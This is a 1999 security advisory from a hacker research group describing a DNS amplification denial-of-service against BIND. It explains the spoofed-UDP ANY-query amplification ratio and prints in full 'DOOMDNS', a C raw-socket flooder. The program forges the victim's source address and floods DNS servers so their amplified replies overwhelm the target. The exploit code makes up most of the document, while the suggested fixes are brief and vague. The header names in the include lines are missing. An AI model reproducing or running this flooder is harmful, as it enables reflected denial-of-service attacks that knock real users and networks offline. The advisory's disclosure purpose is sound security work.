SPJ-002-000: .::::::::+[ s0ftpr0ject 99 ]+::::::::. ::::+[ Digital Security for Y2K ]+:::: :::'"""`"'"""`"'"""`"'"""`"'"`"'""`::: ::'.g#S$"$S#n. .g#S$"$S#n. S#n.`:: :: $$$$$ $$$$$ $$$$$ $$$$$ $$$$ :: :: $$$$$ $$$$$ $$$$$ $$$$ :: :: `$$$$$$$$$n $$$$$ $$$$$ $$$$ :: :: $$$$$ $$$$$s$$$$' $$$$ :: :: $$$$$ $$$$$ $$$$$ $$$$$ $$$$ :: :: `$$$$s$$$S' `$$$$ `$$$$s$$S' :: :::...........:.....:::::..........::: :::+[ Security Advisory, 002-000 ]+::: `::::::::+[ July 19, 1999 ]+:::::::::' Possible Denial Of Service using DNS by |scacco| ---[ Systems affected ]------------------------------------------------------- All systems running Bind (All versions seems affected). ---[ Condition of discovery ]------------------------------------------------- This misfeature was discovered configuring bind on a Red Hat 5.2 system shipped with the original cdrom, allowing udp dns requests and without access lists. ---[ Detailed description ]--------------------------------------------------- All domain name systems resides on port 53 formely called domain. Looking at rfc and in particular at RedHat system defaults seems that port 53 is enabled to support udp and tcp requests as specified in /etc/services file: domain 53/tcp domain 53/udp It's possible to flood someone sending spoofed UDP QUERY to the DNS, because UDP doesn't provide a fruitful authentication process. Why use DNS QUERY? Simple. We just want to make sure we've got a real advantage against our nice target so we look for a good I/O ratio. With just a few bytes (20-30) we can achieve responses of around 400-500 bytes. So we usually achieve a 20x ratio. Furthemore, every DNS reply will eligit ICMP unreach packets from the target since no UDP port will be open to accept data. A modem user compared with large RR of type * (0xFF) will be flooded. * ---[ Exploitation ]----------------------------------------------------------- /****************************************************************** * * * DOOMDNS Yet another flooder with 1:x pkts ratio. This one * * exploits DNS simple QUERY with spoofed UDPs. * * Since almost every DNS is bound to answer queries * * from the void, and since UDP doesn't provide a * * fruitful authentication process cause plain TCP * * does, uh !? ;) here we are. * * * * hints by |scacco|, code by FuSyS * * http://www.s0ftpj.org * * * ******************************************************************/ #include #include #include #include #include #include #include #include #include #include #include #include #include #define IP_HEAD_BASE 20 #define UDP_HEAD_BASE 8 unsigned long saddr; int sfd, loop; char *dns_def[]={/* LISTA ASSENTE */ ,NULL}; char *domains[]={/* LISTA ASSENTE */ ,NULL}; struct DNS_MSG { HEADER head; char query[255]; }; struct dns_pkt { struct iphdr ip; struct udphdr udp; char data[1000]; }; unsigned long nameResolve(char *hostname) { struct in_addr addr; struct hostent *hostEnt; if((addr.s_addr=inet_addr(hostname)) == -1) { if(!(hostEnt=gethostbyname(hostname))) { fprintf(stderr,"N0 SUCH H0ST:`%s`\n",hostname); exit(0); } bcopy(hostEnt->h_addr,(char *)&addr.s_addr,hostEnt->h_length); } return addr.s_addr; } void forge (unsigned long daddr, unsigned short src, unsigned short dst) { struct sockaddr_in sin; struct dns_pkt dpk; struct DNS_MSG killer; int shoot, len; memset(&killer, 0, sizeof(killer)); killer.head.id=getpid(); killer.head.rd=1; killer.head.aa=0; killer.head.opcode=QUERY; killer.head.qr=0; killer.head.qdcount=htons(1); killer.head.ancount=htons(0); killer.head.nscount=htons(0); killer.head.arcount=htons(0); strcat(killer.query, domains[--loop]); killer.query[strlen(domains[loop])+2]=0x00FF; killer.query[strlen(domains[loop])+4]=0x0001; memset(&dpk, 0, sizeof(dpk)); dpk.udp.source=src; dpk.udp.dest=dst; len=(12+strlen(killer.query)+5); dpk.udp.len=htons(UDP_HEAD_BASE+len); memcpy(dpk.data, (void*)&killer, len); dpk.ip.ihl=5; dpk.ip.version=4; dpk.ip.tos=0; dpk.ip.tot_len=htons(IP_HEAD_BASE+UDP_HEAD_BASE+len); dpk.ip.frag_off=0; dpk.ip.ttl=64; dpk.ip.protocol=IPPROTO_UDP; dpk.ip.saddr=saddr; dpk.ip.daddr=daddr; memset(&sin, 0, sizeof(sin)); sin.sin_family=AF_INET; sin.sin_port=dst; sin.sin_addr.s_addr=daddr; shoot=sendto(sfd, &dpk,IP_HEAD_BASE+UDP_HEAD_BASE+len, 0, (struct sockaddr *)&sin, sizeof(sin)); if(shoot<0)fprintf(stderr, "SPOOF ERROR"); loop++; } void doomzone (void) { unsigned long daddr; unsigned short source, dest; if(dns_def[loop]==NULL) loop=0; daddr=nameResolve(dns_def[loop++]); source=htons(1024+(rand()%2000)); dest=htons(53); forge(daddr, source, dest); } int main (int argc, char **argv) { int sfdo; unsigned int hz=100; if(argc<2) { fprintf(stderr, "Interesting .... let's flood ourselves ?!\n"); fprintf(stderr, "Use: %s target [n]\n", argv[0]); exit(0); } if(argv[2]) hz=atoi(argv[2]); saddr=nameResolve(argv[1]); srand(time(NULL)); if((sfd=socket(AF_INET, SOCK_RAW, IPPROTO_RAW))<0) { fprintf(stderr, "\nSOCK_RAW Died\n"); exit(2); } sfdo=1; if(setsockopt(sfd, IPPROTO_IP, IP_HDRINCL, &sfdo, sizeof(sfdo))<0) { fprintf(stderr, "\nIP_HDRINCL Died\n"); exit(3); } printf("\n\033[1;32mD00M DNS\033[0m"); printf("\n\033[1;34mDNS Flooder by FuSyS\033[0m"); printf("\n\033[1;34minithints by |scacco|\033[0m\n\n"); loop=0; while(hz--) { doomzone(); printf("\033[1;34m.\033[0m"); } printf("\n\n"); return(0); } ---[Possible fixes ]---------------------------------------------------------- Seems hard to fix this hole due to dns protocol specification, it could be possible to setup access lists or some sort of packet sanity check, for this we want suggest you to keep in contact with ISC staff to get a more efficent solution for this problem. ---[ URLs and references ]---------------------------------------------------- Internet Software Consurtium can be found at http://www.isc.org. This is also the home of bind. ---[ Contact informations ]--------------------------------------------------- s0ftpr0ject 99 - Digital security for Y2K (s0ftpj) no-profit security research Internet site: http://www.s0ftpj.org E-mail : staff@s0ftpj.org All advisories and security documents are available via http at: http://www.s0ftpj.org (195.32.69.44) courtesy of Metro Olografix http://www.olografix.org (195.32.69.44) This document has no copyright, feel free to distribute it without any limitation. Original copy of this document can be found at out Internet site for free. You are not allowed to modify this paper without prior notify to s0ftpr0ject staff at staff@s0ftpj.org. ---[ s0ftpr0ject 99 staff Public PGP Key ]------------------------------------ Type Bits/KeyID Date User ID pub 2600/15A01BB9 1999/07/22 S0ftPj Staff -----BEGIN PGP PUBLIC KEY BLOCK----- Version: 2.6.3i mQFSAzeXNL8AAAEKKNzvok6FkB24mQUEx5Q4SZ97dQlmx3yNeEvG7aJ/0TDKWWUv f6a+t1jF8V7JMhV1JxU/z38MgTYRGt6dspWlTLKb543GxBRqOdMohigBu8rUmDEb UlD9gAav5M+OSY6oNh5a7e/YrPLhOiqxNxBIXQCDgKtIUv9NF8KbcbS96EAmNsuH UA/hJ2Arlx2wSkmJZgvcpiM6O/1g1OYgg7Gur39SqsNZn0RUKxi463qASGfJT4sa rpH6clBsVpNei5bf/4Bke5/8dnJL5DzM0twxTUmvdq1Pt1+6sRCd70IsqXPvjZu2 Drx4rzlLItD84xmE9w/vGdLMtPSTPwX7ak2TvhWqBOkqzWJNiRjzi+T6HiNfuqUr sr90FndiRNJcWCbmPs2TJISLePsi9AVGL5KFfmimdSJPagzWG1FVQhyo2HS4nRWg G7kABRG0H1MwZnRQaiBTdGFmZiA8c3RhZmZAczBmdHBqLm9yZz6JAVoDBRA3lzS/ 2HS4nRWgG7kBAaYiCiQPM05Pr5FkSgjHkVUbgyxwuWkp9MDOxhvFAgcsHJUX2h6V F02vzDMR2BOvaRhkm43IwXxK490Tp86pbbhC28SiF3TEyHjmu8tMrXo/cX69fcqy IbvVgHKEIUYR8Sik7mLX9HqUh9qh7e6o4cH5TsCCJxIoqf2Qt4t5HA4m77H1niNP EqY2HGzvQUPfvTf+KffdLGoAa/NSKJyB8stlWIJ4SAe7EkGscSjcDFvrm25pDT33 JHyBHBdmUY0Kr+gzmg9CuUZUhVtdun0mwZJLicOSUFQeYuPsid+ayggdgfGR7spM NymPkS2MF8jGOKCa9EqWbn5gBP0uZm5aMrg6+O+s+xNonK0BcFH7iIUAsL9qUHLD 4edFudwxa6XW7LuJoqDVlUzhqA3Ru5Yd8eTD7vbcjR3fRngDpLDu8UhC0MFQSoDW IWKJ =i4i0 -----END PGP PUBLIC KEY BLOCK-----